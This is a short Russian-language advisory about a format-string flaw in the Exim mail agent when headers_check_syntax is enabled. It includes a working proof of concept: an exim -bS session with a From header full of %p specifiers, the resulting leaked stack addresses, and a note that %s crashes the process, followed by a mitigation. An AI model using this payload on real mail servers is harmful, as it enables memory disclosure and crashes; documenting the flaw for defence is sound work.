Exim - это агент передачи сообщений (Message Transfert Agent) использующийся в UNIX системах подключенных к интернету. Уязвимость работает только при включенной опции headers_check_syntax (по умолчанию она отключена).
Exploit:
Делаем следующее:
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p
После этого, в ответе мы увидим:
550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
Если изменить %p's на %s, то получим ошибку segfault.
Для устранения не включайте опцию
headers_check_syntax.
